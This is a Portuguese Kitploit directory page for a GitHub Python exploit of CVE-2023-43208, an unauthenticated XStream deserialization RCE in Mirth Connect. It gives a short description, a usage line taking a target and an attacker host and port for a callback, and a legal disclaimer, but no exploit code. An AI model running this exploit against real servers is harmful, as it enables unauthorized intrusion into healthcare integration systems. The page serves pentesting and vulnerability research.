Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Mirth-Connect-CVE-2023-43208 — Implementação em Python do CVE-2023-43208 Mirth Connect RCE (Unauth XStream) | Kitploit
Ferramentas/GitHubGitHub/az4rvs/mirth-connect-cve-2023-43208
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubaz4rvs/mirth-connect-cve-2023-43208

Mirth-Connect-CVE-2023-43208

Implementação em Python do CVE-2023-43208 Mirth Connect RCE (Unauth XStream)

Ver Repositório
21há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-43208: Execução Remota de Código (RCE) Não Autenticada no NextGen Mirth Connect

Python Version Vulnerability

Este exploit aproveita uma vulnerabilidade crítica de desserialização no motor XStream do Mirth Connect. Ela decorre de uma correção incompleta para CVE-2023-37679, permitindo a execução arbitrária de código não autenticada em todas as versões anteriores à 4.4.1.

Uso

root@kitploit:~
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>

Aviso Legal

Este script de exploit destina-se estritamente a fins educacionais e auditorias de segurança autorizadas para auxiliar defensores na mitigação da CVE-2023-43208; qualquer uso desta ferramenta contra alvos não autorizados é ilegal e de responsabilidade exclusiva do usuário final. O autor fornece este software "como está" sem quaisquer garantias, isenta-se de toda responsabilidade por uso indevido ou danos potenciais, e não endossa ou incentiva atividades não autorizadas. Use por sua conta e risco e apenas em conformidade com as leis aplicáveis.

Baixar ferramenta